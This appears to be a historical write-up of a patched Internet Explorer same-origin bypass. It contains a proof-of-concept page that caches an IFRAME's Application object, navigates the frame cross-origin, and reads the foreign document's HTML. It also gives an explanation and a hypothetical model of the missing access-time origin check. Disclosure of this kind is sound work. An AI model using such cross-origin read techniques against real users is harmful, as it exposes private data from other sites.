Caching the Application property of an IFRAME before navigating it to a cross-origin URL gives unrestricted access to the cross-origin document. The Application property returns the top-level WebBrowser Control object, and that object’s Document property bypasses the same-origin check entirely.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XDOM_MaskedWBControlCachedWindow</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XDOM_MaskedWBControlCachedWindow</h2>
<iframe id="crossDomainIframe" width="400" height="200"></iframe><br /><br />
</center>
<hr />
<font color="green">// Let's cache the "Application" (window) object...</font><br />
var <b>cachedWindow</b> = document.getElementById("<b>crossDomainIframe</b>").<b>Application</b>;<br /><br />
<font color="green">// Now we load (with no tricks) Google inside the IFRAME.</font><br />
document.getElementById("crossDomainIframe").contentWindow.<b>location.replace</b>("http://www.google.com");<br /><br />
<font color="green">// The rest is history...</font><br />
setTimeout('alert(<b>cachedWindow</b>.Document.body.innerHTML);',5000);
<hr />
</font>
<script language="JavaScript">
var cachedWindow = document.getElementById("crossDomainIframe").Application;
document.getElementById("crossDomainIframe").contentWindow.location.replace("http://www.google.com");
setTimeout('alert(cachedWindow.Document.body.innerHTML);',5000);
</script>
</body>
</html>
The Application property on an IFRAME element returns the IWebBrowser2 object representing the top-level browser instance. This object’s Document property provides access to the current document without performing a same-origin check at the application level. Because the reference is cached before the navigation, it stays valid after the IFRAME loads a different domain.
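The access-time check that was missing, shown as an added example that is not part of the original page and is not Internet Explorer's code. It is a simplified model in which `Frame`, `UncheckedHandle`, `CheckedHandle` and the `.example` origins are all hypothetical: a handle cached while the frame was same-origin reads the navigated document, next to a handle that compares origins on every access.

```javascript
// Simplified model of the flaw; every name here is hypothetical, not IE's code.
// A frame holds whichever document it currently displays.
class Frame {
  constructor(url, html) {
    this.navigate(url, html);
  }
  navigate(url, html) {
    // Origin = scheme + host + port of the loaded URL.
    this.document = { origin: new URL(url).origin, body: { innerHTML: html } };
  }
}

// Flawed handle: returns the frame's current document and never looks at the caller.
class UncheckedHandle {
  constructor(frame) { this.frame = frame; }
  getDocument(callerOrigin) { return this.frame.document; }
}

// Hardened handle: compares the caller with the document that is current at access time.
class CheckedHandle {
  constructor(frame) { this.frame = frame; }
  getDocument(callerOrigin) {
    const doc = this.frame.document;
    if (doc.origin !== callerOrigin) throw new Error("Access is denied.");
    return doc;
  }
}

// Cache a handle while the frame is same-origin, navigate, then read through the handle.
function readAfterNavigation(HandleClass) {
  const callerOrigin = "http://embedder.example"; // constructed sample origins
  const frame = new Frame("http://embedder.example/blank.html", "<p>blank</p>");
  const cached = new HandleClass(frame); // obtained before the navigation
  cached.getDocument(callerOrigin); // same-origin at this point: both handles allow it
  frame.navigate("http://other.example/", "<p>private to other.example</p>");
  try {
    return "read: " + cached.getDocument(callerOrigin).body.innerHTML;
  } catch (e) {
    return "blocked: " + e.message;
  }
}

console.log(readAfterNavigation(UncheckedHandle));
console.log(readAfterNavigation(CheckedHandle));
```

The check has to live on the property access itself, because a reference obtained legitimately before navigation outlives the document it was obtained for.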
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.